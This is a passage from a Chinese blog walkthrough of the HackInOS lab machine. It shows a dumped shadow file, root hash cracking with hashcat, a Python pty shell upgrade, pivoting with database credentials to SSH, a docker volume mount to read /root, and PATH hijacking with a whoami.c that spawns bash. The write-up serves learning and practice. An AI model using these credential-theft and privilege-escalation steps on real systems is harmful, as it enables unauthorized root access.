class="variable">$qoj6</span>/JJi<span class="variable">$FQe</span>/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::</span><br><span class="line">daemon:*:17931:0:99999:7:::</span><br><span class="line">bin:*:17931:0:99999:7:::</span><br><span class="line">sys:*:17931:0:99999:7:::</span><br><span class="line">sync:*:17931:0:99999:7:::</span><br><span class="line">games:*:17931:0:99999:7:::</span><br><span class="line">man:*:17931:0:99999:7:::</span><br><span class="line">lp:*:17931:0:99999:7:::</span><br><span class="line">mail:*:17931:0:99999:7:::</span><br><span class="line">news:*:17931:0:99999:7:::</span><br><span class="line">uucp:*:17931:0:99999:7:::</span><br><span class="line">proxy:*:17931:0:99999:7:::</span><br><span class="line">www-data:*:17931:0:99999:7:::</span><br><span class="line">backup:*:17931:0:99999:7:::</span><br><span class="line">list:*:17931:0:99999:7:::</span><br><span class="line">irc:*:17931:0:99999:7:::</span><br><span class="line">gnats:*:17931:0:99999:7:::</span><br><span class="line">nobody:*:17931:0:99999:7:::</span><br><span class="line">_apt:*:17931:0:99999:7:::</span><br></pre></td></tr></table></figure></p>
<p><img src="https://cc-sir.github.io/photos/Hackinos12.png" alt="root_bash"><br>这里得到了root用户密码的hash值，我们先把hash值保存到文件root.hash中，然后利用hashcat破解它：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># hashcat -w 3 -a 0 -m 1800 -o root.out root.hash /usr/share/metasploit-framework/data/wordlists/common_roots.txt --force</span></span><br></pre></td></tr></table></figure></p>
<p>得到密码：john<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~<span class="comment"># cat root.out </span></span><br><span class="line"><span class="variable">$6</span><span class="variable">$qoj6</span>/JJi<span class="variable">$FQe</span>/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:john</span><br></pre></td></tr></table></figure></p>
<p>于是我们su root，但是发现：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">su root</span><br><span class="line">su: must be run from a terminal</span><br></pre></td></tr></table></figure></p>
<p>所以我们用python伪造一个终端，然后来su root:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"import pty;pty.spawn('/bin/bash');"</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://cc-sir.github.io/photos/Hackinos13.png" alt="su_root"><br>然后拿到了flag:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">root@1afdd1f6b82c:/var/www/html<span class="comment"># cd</span></span><br><span class="line"><span class="built_in">cd</span></span><br><span class="line">root@1afdd1f6b82c:~<span class="comment"># ls</span></span><br><span class="line">ls</span><br><span class="line">flag</span><br><span class="line">root@1afdd1f6b82c:~<span class="comment"># cat flag</span></span><br><span class="line">cat flag</span><br><span class="line">Life consists of details..</span><br></pre></td></tr></table></figure></p>
<h2 id="横向渗透"><a href="#横向渗透" class="headerlink" title="横向渗透"></a>横向渗透</h2><p>很明显这不是真正的flag，我们刚才还得到了一个数据库密码，所以我们登录看看：<br><img src="https://cc-sir.github.io/photos/Hackinos14.png" alt="mysql"><br>我们这里发现一个用户名和密码，之前扫描端口是发现一个22端口，所以这个可能是ssh的登录信息，这个密码md5解密出来后是123456；<br>我们登录试试：<br><img src="https://cc-sir.github.io/photos/Hackinos15.png" alt="ssh"><br>登录成功，但是我们发现权限还是低，所以这里又要提权….</p>
<h2 id="提取2"><a href="#提取2" class="headerlink" title="提取2"></a>提取2</h2><p>我们看这个用户名特别像在docker里面，查看一下：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hummingbirdscyber@vulnvm:~$ id</span><br><span class="line">uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)</span><br></pre></td></tr></table></figure></p>
<p>确实是，因为docker权限就能读到/root中的文件了，所以可以利用docker run的-v参数，将/root挂载到容器中：<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker run -it -v /root:/root ubuntu:latest /bin/bash</span><br></pre></td></tr></table></figure></p>
<p>成功获得flag:<br><img src="https://cc-sir.github.io/photos/Hackinos16.png" alt="flag"></p>
<h2 id="命令劫持"><a href="#命令劫持" class="headerlink" title="命令劫持"></a>命令劫持</h2><p>其实最后一个提取，我们还可以利用命令劫持的方法，因为我们发现在目标机器的desktop上面有一个程序，运行之后会输出root字样，然后用strings命令还看到了whoami字样：<br><img src="https://cc-sir.github.io/photos/Hackinos17.png" alt="whoami"><br>所以，我们猜测这个程序是root权限并且程序里面掉用了system(“whoami”)命令，所以我们可以把想办法把whoami这个命令在机器上替换为system(“/bin/bash”)，利用pwn的思想来提取；<br>查找一下PATH的位置：<br><img src="https://cc-sir.github.io/photos/Hackinos18.png" alt="path"><br>现在命令劫持就非常方便了；<br>whoami.c:<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span> </span>&#123;</span><br><span class="line">    system(<span class="string">"/bin/bash"</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>然后我们编译它得到可执行文件<code>whoami</code>，然后在创建一个bin文件夹，将whoami放进去：<br><img src="https://cc-sir.github.io/photos/Hackinos19.png" alt="gcc"><br>最后运行a.out程序即可提取：<br><img src="https://cc-sir.github.io/photos/Hackinos1.png" alt="root"></p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/07/12/hackinos/">HackInOS</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 钞sir 的个人博客">钞sir</a></p>
        <p><span>发布时间:</span>2019年07月12日 - 22时20分</p>
        <p><span>最后更新:</span>2019年07月12日 - 22时20分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/07/12/hackinos/" title="HackInOS">https://cc-sir.github.io/2019/07/12/hackinos/</a>
            <span class="copy-path" data-clipboard-text="原文: https://cc-sir.github.io/2019/07/12/hackinos/　　作者: 钞sir" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2019/07/24/Linux-kernel-0/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          Linux kernel Exploit 内核漏洞学习(0)-环境安装
        
      </div>
    </a>
  
  
    <a href="/2019/06/23/fmtstr_payload/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Fmtstr_Loop</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#简介"><span class="toc-number">1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#渗透步骤"><span class="toc-number">2.</span> <span class="toc-text">渗透步骤</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2-利用文件上传漏洞"><span class="toc-number">2.1.</span> <span class="toc-text">2.利用文件上传漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#提权1"><span class="toc-number">2.2.</span> <span class="toc-text">提权1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#横向渗透"><span class="toc-number">2.3.</span> <span class="toc-text">横向渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#提取2"><span class="toc-number">2.4.</span> <span class="toc-text">提取2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#命令劫持"><span class="toc-number">2.5.</span> <span class="toc-text">命令劫持</span></a></li></ol></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>







    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/07/24/Linux-kernel-0/" title="上一篇: Linux kernel Exploit 内核漏洞学习(0)-环境安装">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2019/06/23/fmtstr_payload/" title="下一篇: Fmtstr_Loop">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/08/24/Linux-kernel-exploit2/">Linux Kernel Exploit 内核漏洞学习(2)-ROP</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/24/Linux-kernel3/">Linux Kernel Exploit 内核漏洞学习(3)-Bypass-Smep</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/24/Linux-kernel-1/">Linux Kernel Exploit 内核漏洞学习(1)-Double Fetch</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/24/Linux-kernel-0/">Linux kernel Exploit 内核漏洞学习(0)-环境安装</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/12/hackinos/">HackInOS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/06/23/fmtstr_payload/">Fmtstr_Loop</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/11/滑雪大冒险内购/">滑雪大冒险2 App内购</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/28/pwnf/">hctf2016-fheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/26/ret2_dl_runtime_resolve/">ret2_dl_runtime_resolve</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/16/PE文件格式/">PE文件格式</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/06/namebook/">namebook</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/03/unlink/">Unlink</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/01/Tcache/">Hgame2019_babytcache</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/01/pwnable_tw/">pwnable.tw</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/22/hacknote/">pwnable.tw_hacknote</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/29/dynelf/">DynELF</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/28/ichunqiu_easypwn/">Ichunqiu_Easypwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/26/ret2libc/">Ret2libc</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/24/ret2shellcode/">Ret2ShellCode</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/20/overflow_freed_chunk/">Overflow Freed Chunk</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/19/Fastbin_Double_Free/">Fastbin Double Free</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/11/use_after_free/">Use After Free</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/11/hello-world/">Hello World</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 钞sir
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">海贼到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>